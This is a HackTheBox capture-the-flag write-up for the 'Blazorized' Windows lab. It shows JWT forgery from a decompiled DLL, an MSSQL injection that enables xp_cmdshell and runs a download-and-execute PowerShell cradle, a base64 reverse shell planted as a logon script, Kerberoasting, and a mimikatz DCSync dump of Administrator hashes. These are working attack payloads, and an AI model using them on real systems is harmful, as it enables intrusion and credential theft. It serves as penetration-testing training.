Hackthebox: Blazorized

Overview

Blazorized is a Hard-difficulty windows HackTheBox machine dealing initially with subdomain enumeration and DLL decompiling to be able to forge our own JWT token and get into the admin panel where we’ll be abusing an sql injection over MSSQL and get a shell. Later performing a mix of different attacks to acquire different users: from Kerberoasting to script path setting and abuse to DCSync and getting system. It was a really fun box.

Reconnaissance

Nmap

PS C:\Users\0xkujen> nmap -A -Pn 10.129.23.80 
Starting Nmap 7.95 ( https://nmap.org ) at 2024-11-10 21:55 W. Central Africa Standard Time
Nmap scan report for 10.129.23.80
Host is up (0.30s latency).
Not shown: 986 filtered tcp ports (no-response)
PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
80/tcp   open  http          Microsoft IIS httpd 10.0
|_http-title: Did not follow redirect to http://blazorized.htb
|_http-server-header: Microsoft-IIS/10.0
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2024-11-10 21:01:09Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: blazorized.htb0., Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped
1433/tcp open  ms-sql-s      Microsoft SQL Server 2022
|_ms-sql-info: ERROR: Script execution failed (use -d to debug)
|_ms-sql-ntlm-info: ERROR: Script execution failed (use -d to debug)
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2024-11-10T20:59:17
|_Not valid after:  2054-11-10T20:59:17
|_ssl-date: 2024-11-10T21:01:59+00:00; +5m00s from scanner time.
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: blazorized.htb0., Site: Default-First-Site-Name)
3269/tcp open  tcpwrapped
5985/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
Service Info: Host: DC1; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time:
|   date: 2024-11-10T21:01:31
|_  start_date: N/A
| smb2-security-mode:
|   3:1:1:
|_    Message signing enabled and required
|_clock-skew: mean: 4m59s, deviation: 0s, median: 4m59s

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 93.48 seconds
PS C:\Users\0xkujen>

We can see that we have a web application running on port 80 that’s redirecting us to blazorized.htb, let’s add that entry to our /etc/hosts file and check what we have ;)

Subdomain Enumeration

We perform some subdomain enumeration on the main domain and we find something interesting:

PS C:\Users\0xkujen\Desktop\Tools\ffuf_2.0.0_windows_amd64> .\ffuf.exe -w ..\SecLists-master\SecLists-master\Discovery\DNS\bitquark-subdomains-top100000.txt -H "Host: FUZZ.blazorized.htb" -u "http://10.129.23.80" -fs 144

        /'___\  /'___\           /'___\
       /\ \__/ /\ \__/  __  __  /\ \__/
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
         \ \_\   \ \_\  \ \____/  \ \_\
          \/_/    \/_/   \/___/    \/_/

       v2.0.0
________________________________________________

 :: Method           : GET
 :: URL              : http://10.129.23.80
 :: Wordlist         : FUZZ: C:\Users\0xkujen\Desktop\Tools\SecLists-master\SecLists-master\Discovery\DNS\bitquark-subdomains-top100000.txt
 :: Header           : Host: FUZZ.blazorized.htb
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200,204,301,302,307,401,403,405,500
 :: Filter           : Response size: 144
________________________________________________

[Status: 200, Size: 2072, Words: 149, Lines: 28, Duration: 327ms]0:00:00] :: Errors: 0 ::
    * FUZZ: admin

We go ahead and add admin.blazoried.htb to our /etc/hosts file.

Web Application - http://blazoried.htb/

This site is a personal Digital Garden, and the “Built with Blazor WebAssembly” is really interesting as it will come in handy later.
(I found an XSS vulnerability under the http://blazorized.htb/markdown endpoint but turned out to be a rabbit hole :’( )

Checking Caido while inspecting our application shows us that there are a lot of DLLs being loaded into the app:

But navigation to the /check-updates endpoint, we see a new DLL being loaded. This shows that the app implements Lazy Loading and providing resources as the user needs them not loading everything all at once (this is what I understood from the docs of the frmaework):
However, navigating to this endpoint we get However, you can use the button below to impersonate (temporarily, and securely) the admin and fetch all post and category updates.
So I just thought this /_framework/Blazorized.Helpers.dll DLL would be interesting, so let’s download it and open it with Dotpeek :

We can see that one of the Helpers detailed is the implementation of the JWT policy for the application, where we have the Security Key and mention about the admin dashboard we found out later. I think it’s about time we go ahead and explore it ;)

Web Application - http://admin.blazoried.htb/

It looks like a simple admin dashboard with a login feature, but I could not find a cookie anywhere to exploit the JWT settings we got earlier.
But an idea I just got, since we know that the app is implementing lazy loading, I’ll check other endpoints from the main domain and see if I get something interesting. And we do get a response from the API with a model for the JWT token:

We can see that the roles we have withing that cookie are only “Posts_Get_All” and “Categories_Get_All”. But checking from the DLL we decompiled, we can see that we have a superAdminRoleClaimValue = "Super_Admin" role and that the used algorithm is “HS512”
So we should update our cookie with that role, update the audience to “http://admin.blazorized.htb “. Let’s see:

And test it out on our admin dashboard:

And we are in!

SQL Injection - http://admin.blazorized.htb/check-duplicate-post-title

There seems to be an SQLI in the http://admin.blazorized.htb/check-duplicate-post-title endpoint:

Also, during our initial Nmap scan, we saw that we have an MSSQL service running so I’ll just assume the SQLI query is being executed on a MSSQL DB. This can be useful: “https://github.com/swisskyrepo/PayloadsAllTheThings/blob/314e4da9632f6e20cd149ca55020e50556c6280f/SQL%20Injection/MSSQL%20Injection.md#L4 “

We must execute these queries against the database so we could get a reverse shell:

;' EXECUTE sp_configure 'show advanced options',1 -- -
;' RECONFIGURE
;' EXECUTE sp_configure 'xp_cmdshell',1 -- -
;' RECONFIGURE
; ' EXECUTE master.dbo.xp_cmdshell 'powershell -c "iex(New-Object Net.WebClient).DownloadString(''http://10.10.x.x/r.ps1'')" --

And I have a shell:

PS C:\Users\0xkujen> nc -lvnp 4444
listening on [any] 4444 ...
connect to [10.10.x.x] from (UNKNOWN) [10.129.23.80] 63124
Windows PowerShell running as user DC1$ on DC1
Copyright (C) 2015 Microsoft Corporation. All rights reserved.

PS C:\Windows\system32>whoami
blazorized\nu_1055
PS C:\Windows\system32>

And our user flag:

PS C:\users\nu_1055\desktop> ls

    Directory: C:\users\nu_1055\desktop

Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-ar---       11/10/2024   2:59 PM             34 user.txt

PS C:\users\nu_1055\desktop> cat user.txt
3cc2d0241aa485******************
PS C:\users\nu_1055\desktop>

Privilege Escalation

Kerberoatsting rsa_4810 user

I’ll first be running SharpHound on the box and visualize it on BloodHound:

PS C:\users\nu_1055> ./SharpHound.exe -c all

2024-11-10T17:24:23.4251341-06:00|INFORMATION|This version of SharpHound is compatible with the 4.2 Release of BloodHound
2024-11-10T17:24:23.5970045-06:00|INFORMATION|Resolved Collection Methods: Group, LocalAdmin, GPOLocalGroup, Session, LoggedOn, Trusts, ACL, Container, RDP, ObjectProps, DCOM, SPNTargets, PSRemote
2024-11-10T17:24:23.6282573-06:00|INFORMATION|Initializing SharpHound at 5:24 PM on 11/10/2024
2024-11-10T17:24:23.8938920-06:00|INFORMATION|Flags: Group, LocalAdmin, GPOLocalGroup, Session, LoggedOn, Trusts, ACL, Container, RDP, ObjectProps, DCOM, SPNTargets, PSRemote
2024-11-10T17:24:24.0501665-06:00|INFORMATION|Beginning LDAP search for blazorized.htb
2024-11-10T17:24:24.0970246-06:00|INFORMATION|Producer has finished, closing LDAP channel
2024-11-10T17:24:24.0970246-06:00|INFORMATION|LDAP channel closed, waiting for consumers
2024-11-10T17:24:54.6908030-06:00|INFORMATION|Status: 0 objects finished (+0 0)/s -- Using 35 MB RAM
2024-11-10T17:25:13.0657537-06:00|INFORMATION|Consumers finished, closing output channel
2024-11-10T17:25:13.0970076-06:00|INFORMATION|Output channel closed, waiting for output task to complete
Closing writers
2024-11-10T17:25:13.2845061-06:00|INFORMATION|Status: 110 objects finished (+110 2.244898)/s -- Using 43 MB RAM
2024-11-10T17:25:13.2845061-06:00|INFORMATION|Enumeration finished in 00:00:49.2326936
2024-11-10T17:25:13.3626356-06:00|INFORMATION|Saving cache with stats: 70 ID to type mappings.
 70 name to SID mappings.
 0 machine sid mappings.
 2 sid to domain mappings.
 0 global catalog mappings.
2024-11-10T17:25:13.3782603-06:00|INFORMATION|SharpHound Enumeration Completed at 5:25 PM on 11/10/2024! Happy Graphing!

I’ll now use this script to make it a base64 and transfer it out of the machine:

$inputFile = "C:\users\nu_1055\20241110172512_BloodHound.zip"
$outputFile = "C:\users\nu_1055\mem.b64"

# Open input file and output file streams
$inputStream = [System.IO.File]::OpenRead($inputFile)
$outputStream = [System.IO.StreamWriter]::new($outputFile)

try {
    # Set chunk size (adjust as needed)
    $chunkSize = 64KB
    $buffer = New-Object byte[] $chunkSize

    # Read and encode the file in chunks
    while (($bytesRead = $inputStream.Read($buffer, 0, $buffer.Length)) -gt 0) {
        $encodedChunk = [Convert]::ToBase64String($buffer, 0, $bytesRead)
        $outputStream.WriteLine($encodedChunk)
    }
}
finally {
    # Close the file streams
    $inputStream.Close()
    $outputStream.Close()
}

Write-Host "Base64 encoding completed."

Later clean it:

┌──(kali㉿kali)-[~/Hackthebox/blazorized]
└─$ nano b64.data
                                                                                                                                                                                                            
┌──(kali㉿kali)-[~/Hackthebox/blazorized]
└─$ grep -o '[A-Za-z0-9+/=]' b64.data | tr -d '\n' > cleaned.b64      

                                                                                                                                                                                                            
┌──(kali㉿kali)-[~/Hackthebox/blazorized]
└─$ base64 -d cleaned.b64 > bloodhound.zip

We can see from the Bloodhound analysis that the “nu_1055” user has WriteSPN over RSA_4810:

“Kerberoasting” is an attack where an authenticated user makes a request to a ticket for a service by it’s SPN (Service Principal Name), then the ticket that comes back is encrypted with the password of the user associated with that service, and that’s when we crack it ;)

The first step is to assign an SPN to the RSA_4810 user, and then request a TGS for it. We’ll do this using PowerView:

PS C:\users\nu_1055> get-domainuser rsa_4810


logoncount            : 23
badpasswordtime       : 2/1/2024 1:29:42 PM
distinguishedname     : CN=RSA_4810,CN=Users,DC=blazorized,DC=htb
objectclass           : {top, person, organizationalPerson, user}
displayname           : RSA_4810
lastlogontimestamp    : 7/12/2024 6:25:46 AM
userprincipalname     : [email protected]
samaccountname        : RSA_4810
codepage              : 0
samaccounttype        : USER_OBJECT
accountexpires        : NEVER
countrycode           : 0
whenchanged           : 11/10/2024 11:47:57 PM
instancetype          : 4
usncreated            : 24627
objectguid            : ed5f4235-a152-4952-bed0-28ae811ee7f4
lastlogoff            : 12/31/1600 6:00:00 PM
whencreated           : 1/9/2024 11:37:15 AM
objectcategory        : CN=Person,CN=Schema,CN=Configuration,DC=blazorized,DC=htb
dscorepropagationdata : {2/2/2024 2:44:29 PM, 2/2/2024 2:40:50 PM, 1/11/2024 2:13:10 AM, 1/10/2024 6:28:26 PM...}
serviceprincipalname  : kujen/hehe
usnchanged            : 356825
memberof              : {CN=Remote_Support_Administrators,CN=Users,DC=blazorized,DC=htb, CN=Remote Management
                        Users,CN=Builtin,DC=blazorized,DC=htb}
lastlogon             : 2/2/2024 11:44:30 AM
badpwdcount           : 0
cn                    : RSA_4810
useraccountcontrol    : NORMAL_ACCOUNT, DONT_EXPIRE_PASSWORD
objectsid             : S-1-5-21-2039403211-964143010-2924010611-1107
primarygroupid        : 513
pwdlastset            : 2/25/2024 11:55:59 AM
name                  : RSA_4810

The SPN is now “kujen/hehe”, let’s request a TGS:

PS C:\users\nu_1055> Get-DomainSPNTicket -SPN kujen/hehe


SamAccountName       : UNKNOWN
DistinguishedName    : UNKNOWN
ServicePrincipalName : kujen/hehe
TicketByteHexStream  :
Hash                 : $krb5tgs$23$*UNKNOWN$UNKNOWN$kujen/hehe*$850720821AFC4CE7E1F59271D3D35181$FBF1C69E09496058DAF58F
                       A1807F8EDC6106EED2F3595F18029048CA9F00A5FED9D37F6081BE5CF841E788E288FA9990DA21BC550424811D36F8E6
                       ADD58F0C26CEB0B7085E935A97603AC3973E150593E2AEF5A3C42618D6EF51F9576670DD3704EBEF615A812985C85505
                       228169288A43762C21E259AFB2C80E0A1ABAF4CA172E84088B2160B1669EBBDFE2358EF1A934B8C12D05A7FEC41C2A51
                       3FB185C22ECFCFE058ACA77D14177A39EE209580F34DCC3BF0563C2AC1194B3E4F60B45D478F28B9AE7182BAFF5DA5AF
                       734C09D3189EE017B0CA1BDBE0538360AE96ED46B0901E8BEC357E1FF2B7A0B8A5DBBD43F5FFF16010346F1E7444F389
                       74D35403517E415AF0E496ED66968A6D36AC61980F4A46C2C0F881969DC766CAFEA3F1A59742E75DA2324703C7AFE0C7
                       5950C3524B6FE0E69B7743AC7B98DC63A5243DBE8648B2D43418986D1D3200724B48CCB923AD63754E4D9A9A1978DD02
                       A93F2A4751C5482A436A7060E28F4059141196A4C5400C9D3A8E5B7E13812A9EF5A1F9DC8F4B09A9949F97CFDC872352
                       7AD422CABF649C176BD369993BC0BB9A31D170D258FD4B5889200B624F19DB192038EA00B1015C60C8F473FCC152E3EB
                       A01D30407206690DC0A28A5BDE26D05795EE9E90638D2444E66BBB6F4ABF0021B989D5CC458C1FC1AE13EA9A7FFADFE6
                       9626CA4AC7363C37B575DF370DB7E375B69334605E05EF922F7A0507B6DC78608E08B81203558398A60487443540BF08
                       7B2F46EAC90E9A373BD064DF1FCA5CECBADBA0F85AC2DFECCD6E51F9FC7E8845A470A0092D2958957E1F9DE6C31C81EF
                       123E1F3AA280D124C3996D141537DB6A515B30CE65A6748B68BBD6A988AFC3F77DD11B456F8E4B708D5A99EBCA88BADA
                       071940B49B4526289FB802500C17100B26C14F1D0FA53716B2A04FD64C7E1BABE336FE373F9A0E68C218EAE724C303DE
                       18DEB9C2C716AF6D97DC6E72EB386628C1C1DE08E7B897AB02EE5CC594D6FA314EDC1431A65AA131677CC38922D05BBF
                       687147C59C4024EF10F8751880A32F950A15B2001AA289A849EBBDB101DA5BD24FD318A575B4B5BD5A56F9E1B84554A2
                       5DA005A9CD17C9454780D6E8C49D4BBB28000195E11CB1C6529A790DB172EDBF079642BF1DE379293B2F3FEB013A5DEC
                       C0181BDA337B0EBDEDFCA7E6B1CD042665A8AE2FD8A2E05FA1797A1837ACB28241CEC84E00BBA559DE57185AD5263489
                       75D0F7240300DCFF0EB196B4E65033804C3525688CC666638C10C51D42CC1CFCA161408B22E356533E489919B3935594
                       FE3EF898189D1DFFDE46C741135536B7A3DE437847B4145125B3ED94DA02EF70B962D804DFAF9CC081141319158852FC
                       5CF2ECEDFD94DA6EC349312EA2D0A9D200B2A7CD1140F28D52CED48D9C5B350B86F64A0DE9C3BB37C0DFBEBA56F25662
                       069616BD4A2588B2D5940B0B0B195A62A15619304C56E8FF1917D1451CA5F6AD631A2AF3F57E42F23EABF1C6CC4E87FD
                       D5D81F19A2FF08FD96F175E8B3FB6256DC59D16A7D657FA4B9E8E0C7674DBE237F95A64AA44E76C609D46359307776D4
                       7BDA4E7D2C1ED4CAC164E0A45BB4F1983CB6E2BB564A5632299199F29CB1E3FE27043D560D0417591E15863904609552
                       524E5C725158D1245449ED727914E47D884006E0B91F68B57ACBED0590D85486B104051CF7CD0C7554DF9710B0D5BE75
                       2EEF2E3A40916EA200594573054812693F463DBC9B28991432215A7FD34DB814703771A32E6A5348ACE01B5CB3



PS C:\users\nu_1055>

Let’s attempt to crack it:

And our password is: (Ni7856Do9854Ki05Ng0005 #)

I can use it to connect to the user using Evil-Winrm:

┌──(kali㉿kali)-[~/Hackthebox/blazorized]
└─$ evil-winrm -i blazorized.htb -u rsa_4810 -p '(Ni7856Do9854Ki05Ng0005 #)'
                                        
Evil-WinRM shell v3.5
                                        
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\RSA_4810\Documents> whoami
blazorized\rsa_4810
*Evil-WinRM* PS C:\Users\RSA_4810\Documents> 

Pivoting to SSA_6010 - Script Execution

When I first solved the machine, the ssa_6010 user had a “scriptpath” variable already set which I changed to a reverse shell script and got a shell for him. We can now check if we can set the scriptpath for him:

*Evil-WinRM* PS C:\Users\RSA_4810\Documents> Set-DomainObject -Identity SSA_6010 -SET @{scriptpath='kujen'}
*Evil-WinRM* PS C:\Users\RSA_4810\Documents> get-domainuser SSA_6010 -properties *


logoncount            : 3278
badpasswordtime       : 6/19/2024 9:58:18 AM
distinguishedname     : CN=SSA_6010,CN=Users,DC=blazorized,DC=htb
objectclass           : {top, person, organizationalPerson, user}
displayname           : SSA_6010
lastlogontimestamp    : 11/10/2024 3:00:14 PM
userprincipalname     : [email protected]
samaccountname        : SSA_6010
codepage              : 0
samaccounttype        : USER_OBJECT
accountexpires        : NEVER
countrycode           : 0
whenchanged           : 11/11/2024 12:10:00 AM
instancetype          : 4
usncreated            : 29007
objectguid            : 8bf3166b-e716-4f91-946c-174e1fb433ed
lastlogoff            : 12/31/1600 6:00:00 PM
whencreated           : 1/10/2024 2:32:00 PM
objectcategory        : CN=Person,CN=Schema,CN=Configuration,DC=blazorized,DC=htb
dscorepropagationdata : {6/19/2024 1:24:50 PM, 6/14/2024 12:40:41 PM, 6/14/2024 12:40:28 PM, 6/14/2024 12:38:20 PM...}
usnchanged            : 356866
memberof              : {CN=Super_Support_Administrators,CN=Users,DC=blazorized,DC=htb, CN=Remote Management Users,CN=Builtin,DC=blazorized,DC=htb}
lastlogon             : 11/10/2024 6:09:14 PM
cn                    : SSA_6010
badpwdcount           : 0
scriptpath            : kujen
useraccountcontrol    : NORMAL_ACCOUNT, DONT_EXPIRE_PASSWORD
objectsid             : S-1-5-21-2039403211-964143010-2924010611-1124
primarygroupid        : 513
pwdlastset            : 2/25/2024 11:56:55 AM
name                  : SSA_6010

Something that was weird to me is that bat script files you put in any directory different than C:\windows\SYSVOL\sysvol\blazorized.htb\scripts\ will not work. But turns out the service will check the scripts folder and appent the scriptpath variable to it.
Checking that directory I find that “A32FF3AEAA23” folder is writeable. So let’s use it:

*Evil-WinRM* PS C:\Windows\SYSVOL\domain\scripts> icacls A32FF3AEAA23
A32FF3AEAA23 BLAZORIZED\RSA_4810:(OI)(CI)(F)
             BLAZORIZED\Administrator:(OI)(CI)(F)
             BUILTIN\Administrators:(I)(F)
             CREATOR OWNER:(I)(OI)(CI)(IO)(F)
             NT AUTHORITY\Authenticated Users:(I)(OI)(CI)(RX)
             NT AUTHORITY\SYSTEM:(I)(OI)(CI)(F)
             BUILTIN\Administrators:(I)(OI)(CI)(IO)(F)
             BUILTIN\Server Operators:(I)(OI)(CI)(RX)

Successfully processed 1 files; Failed processing 0 files
*Evil-WinRM* PS C:\Windows\SYSVOL\domain\scripts> cd A32FF3AEAA23
*Evil-WinRM* PS C:\Windows\SYSVOL\domain\scripts\A32FF3AEAA23> echo 'powershell -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQAwAC4AMQAwAC4AMQA2AC4ANAAzACIALAA5ADAAMAAxACkAOwAkAHMAdAByAGUAYQBtACAAPQAgACQAYwBsAGkAZQBuAHQALgBHAGUAdABTAHQAcgBlAGEAbQAoACkAOwBbAGIAeQB0AGUAWwBdAF0AJABiAHkAdABlAHMAIAA9ACAAMAAuAC4ANgA1ADUAMwA1AHwAJQB7ADAAfQA7AHcAaABpAGwAZQAoACgAJABpACAAPQAgACQAcwB0AHIAZQBhAG0ALgBSAGUAYQBkACgAJABiAHkAdABlAHMALAAgADAALAAgACQAYgB5AHQAZQBzAC4ATABlAG4AZwB0AGgAKQApACAALQBuAGUAIAAwACkAewA7ACQAZABhAHQAYQAgAD0AIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAFQAeQBwAGUATgBhAG0AZQAgAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEEAUwBDAEkASQBFAG4AYwBvAGQAaQBuAGcAKQAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABiAHkAdABlAHMALAAwACwAIAAkAGkAKQA7ACQAcwBlAG4AZABiAGEAYwBrACAAPQAgACgAaQBlAHgAIAAkAGQAYQB0AGEAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcAIAApADsAJABzAGUAbgBkAGIAYQBjAGsAMgAgAD0AIAAkAHMAZQBuAGQAYgBhAGMAawAgACsAIAAiAFAAUwAgACIAIAArACAAKABwAHcAZAApAC4AUABhAHQAaAAgACsAIAAiAD4AIAAiADsAJABzAGUAbgBkAGIAeQB0AGUAIAA9ACAAKABbAHQAZQB4AHQALgBlAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJACkALgBHAGUAdABCAHkAdABlAHMAKAAkAHMAZQBuAGQAYgBhAGMAawAyACkAOwAkAHMAdAByAGUAYQBtAC4AVwByAGkAdABlACgAJABzAGUAbgBkAGIAeQB0AGUALAAwACwAJABzAGUAbgBkAGIAeQB0AGUALgBMAGUAbgBnAHQAaAApADsAJABzAHQAcgBlAGEAbQAuAEYAbAB1AHMAaAAoACkAfQA7ACQAYwBsAGkAZQBuAHQALgBDAGwAbwBzAGUAKAApAA==' | Out-FIle -FIlePath kujen.bat -Encoding ASCII
*Evil-WinRM* PS C:\Windows\SYSVOL\domain\scripts\A32FF3AEAA23> Set-DomainObject -Identity SSA_6010 -SET @{scriptpath='A32FF3AEAA23\kujen.bat'}
*Evil-WinRM* PS C:\Windows\SYSVOL\domain\scripts\A32FF3AEAA23> 

And we got a shell:

PS C:\Users\0xkujen> nc -lvnp 9001
listening on [any] 9001 ...
connect to [10.10.x.x] from (UNKNOWN) [10.129.23.80] 52900
whoami
blazorized\ssa_6010
PS C:\Windows\system32>

Pivoting to Administrator - DCSync

We can see that our current user is part of a “Super_Support_Administrators” group:

PS C:\Windows\system32> whoami /all

USER INFORMATION
----------------

User Name           SID
=================== =============================================
blazorized\ssa_6010 S-1-5-21-2039403211-964143010-2924010611-1124


GROUP INFORMATION
-----------------

Group Name                                 Type             SID                                           Attributes

========================================== ================ ============================================= ==================================================
Everyone                                   Well-known group S-1-1-0                                       Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users            Alias            S-1-5-32-580                                  Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                              Alias            S-1-5-32-545                                  Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias            S-1-5-32-554                                  Group used for deny only
NT AUTHORITY\INTERACTIVE                   Well-known group S-1-5-4                                       Mandatory group, Enabled by default, Enabled group
CONSOLE LOGON                              Well-known group S-1-2-1                                       Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users           Well-known group S-1-5-11                                      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization             Well-known group S-1-5-15                                      Mandatory group, Enabled by default, Enabled group
LOCAL                                      Well-known group S-1-2-0                                       Mandatory group, Enabled by default, Enabled group
BLAZORIZED\Super_Support_Administrators    Group            S-1-5-21-2039403211-964143010-2924010611-1123 Mandatory group, Enabled by default, Enabled group
Authentication authority asserted identity Well-known group S-1-18-1                                      Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Mandatory Level     Label            S-1-16-8192

Checking our BloodHound results, we can see that we can perform DCSync:

So let’s do it and finish this box:

PS C:\users\ssa_6010\documents> iwr 10.10.x.x/BetterSafetyKatz.exe -outfile s.exe
[+] Stolen from @harmj0y, @TheRealWover, @cobbr_io and @gentilkiwi, repurposed by @Flangvik and @Mrtn9
[+] Randomizing strings in memory

[+] Slowly mapping ADVAPI32.dll

[+] Slowly mapping Cabinet.dll

[+] Slowly mapping CRYPT32.dll

[+] Slowly mapping cryptdll.dll

[+] Slowly mapping DNSAPI.dll

[+] Slowly mapping FLTLIB.DLL

[+] Slowly mapping MPR.dll

[+] Slowly mapping NETAPI32.dll

[+] Slowly mapping ODBC32.dll

[+] Slowly mapping ole32.dll

[+] Slowly mapping OLEAUT32.dll

[+] Slowly mapping RPCRT4.dll

[+] Slowly mapping SHLWAPI.dll

[+] Slowly mapping SAMLIB.dll

[+] Slowly mapping Secur32.dll

[+] Slowly mapping SHELL32.dll

[+] Slowly mapping USER32.dll

[+] Slowly mapping USERENV.dll

[+] Slowly mapping VERSION.dll

[+] Slowly mapping HID.DLL

[+] Slowly mapping SETUPAPI.dll

[+] Slowly mapping WinSCard.dll

[+] Slowly mapping WINSTA.dll

[+] Slowly mapping WLDAP32.dll

[+] Slowly mapping advapi32.dll

[+] Slowly mapping msasn1.dll

[+] Slowly mapping ntdll.dll

[+] Slowly mapping netapi32.dll

[+] Slowly mapping KERNEL32.dll
[+] Suicide burn before CreateThread!

  .#####.   mimikatz 2.2.0 (x64) #19041 Dec 23 2022 16:49:51
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( [email protected] )
 ## \ / ##       > https://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX             ( [email protected] )
  '#####'        > https://pingcastle.com / https://mysmartlogon.com ***/

mimikatz(commandline) # lsadump::dcsync /user:blazorized\Administrator
[DC] 'blazorized.htb' will be the domain
[DC] 'DC1.blazorized.htb' will be the DC server
[DC] 'blazorized\Administrator' will be the user account
[rpc] Service  : ldap
[rpc] AuthnSvc : GSS_NEGOTIATE (9)

Object RDN           : Administrator

** SAM ACCOUNT **

SAM Username         : Administrator
Account Type         : 30000000 ( USER_OBJECT )
User Account Control : 00010200 ( NORMAL_ACCOUNT DONT_EXPIRE_PASSWD )
Account expiration   :
Password last change : 2/25/2024 11:54:43 AM
Object Security ID   : S-1-5-21-2039403211-964143010-2924010611-500
Object Relative ID   : 500

Credentials:
  Hash NTLM: f55ed1465179ba374ec1cad05b34a5f3
    ntlm- 0: f55ed1465179ba374ec1cad05b34a5f3
    ntlm- 1: eecc741ecf81836dcd6128f5c93313f2
    ntlm- 2: c543bf260df887c25dd5fbacff7dcfb3
    ntlm- 3: c6e7b0a59bf74718bce79c23708a24ff
    ntlm- 4: fe57c7727f7c2549dd886159dff0d88a
    ntlm- 5: b471c416c10615448c82a2cbb731efcb
    ntlm- 6: b471c416c10615448c82a2cbb731efcb
    ntlm- 7: aec132eaeee536a173e40572e8aad961
    ntlm- 8: f83afb01d9b44ab9842d9c70d8d2440a
    ntlm- 9: bdaffbfe64f1fc646a3353be1c2c3c99
    lm  - 0: ad37753b9f78b6b98ec3bb65e5995c73
    lm  - 1: c449777ea9b0cd7e6b96dd8c780c98f0
    lm  - 2: ebbe34c80ab8762fa51e04bc1cd0e426
    lm  - 3: 471ac07583666ccff8700529021e4c9f
    lm  - 4: ab4d5d93532cf6ad37a3f0247db1162f
    lm  - 5: ece3bdafb6211176312c1db3d723ede8
    lm  - 6: 1ccc6a1cd3c3e26da901a8946e79a3a5
    lm  - 7: 8b3c1950099a9d59693858c00f43edaf
    lm  - 8: a14ac624559928405ef99077ecb497ba

Supplemental Credentials:
* Primary:NTLM-Strong-NTOWF *
    Random Value : 36ff197ab8f852956e4dcbbe85e38e17

* Primary:Kerberos-Newer-Keys *
    Default Salt : BLAZORIZED.HTBAdministrator
    Default Iterations : 4096
    Credentials
      aes256_hmac       (4096) : 29e501350722983735f9f22ab55139442ac5298c3bf1755061f72ef5f1391e5c
      aes128_hmac       (4096) : df4dbea7fcf2ef56722a6741439a9f81
      des_cbc_md5       (4096) : 310e2a0438583dce
    OldCredentials
      aes256_hmac       (4096) : eeb59c1fa73f43372f40f4b0c9261f30ce68e6cf0009560f7744d8871058af2c
      aes128_hmac       (4096) : db4d9e0e5cd7022242f3e03642c135a6
      des_cbc_md5       (4096) : 1c67ef730261a198
    OlderCredentials
      aes256_hmac       (4096) : bb7fcd1148a3863c9122784becf13ff7b412af7d734162ed3cb050375b1a332c
      aes128_hmac       (4096) : 2d9925ef94916523b24e43d1cb8396ee
      des_cbc_md5       (4096) : 9b01158c8923ce68

* Primary:Kerberos *
    Default Salt : BLAZORIZED.HTBAdministrator
    Credentials
      des_cbc_md5       : 310e2a0438583dce
    OldCredentials
      des_cbc_md5       : 1c67ef730261a198

* Packages *
    NTLM-Strong-NTOWF

* Primary:WDigest *
    01  7e35fe37aac9f26cecc30390171b6dcf
    02  a8710c4caaab28c0f2260e7c7bd3b262
    03  81eae4cf7d9dadff2073fbf2d5c60539
    04  7e35fe37aac9f26cecc30390171b6dcf
    05  9bc0a87fd20d42df13180a506db93bb8
    06  26d42d164b0b82e89cf335e8e489bbaa
    07  d67d01da1b2beed8718bb6785a7a4d16
    08  7f54f57e971bcb257fc44a3cd88bc0e3
    09  b3d2ebd83e450c6b0709d11d2d8f6aa8
    10  1957f9211e71d307b388d850bdb4223f
    11  2fa495bdf9572e0d1ebb98bb6e268b01
    12  7f54f57e971bcb257fc44a3cd88bc0e3
    13  de0bba1f8bb5b81e634fbaa101dd8094
    14  2d34f278e9d98e355b54bbd83c585cb5
    15  06b7844e04f68620506ca4d88e51705d
    16  97f5ceadabcfdfcc019dc6159f38f59e
    17  ed981c950601faada0a7ce1d659eba95
    18  cc3d2783c1321d9d2d9b9b7170784283
    19  0926e682c1f46c007ba7072444a400d7
    20  1c3cec6d41ec4ced43bbb8177ad6e272
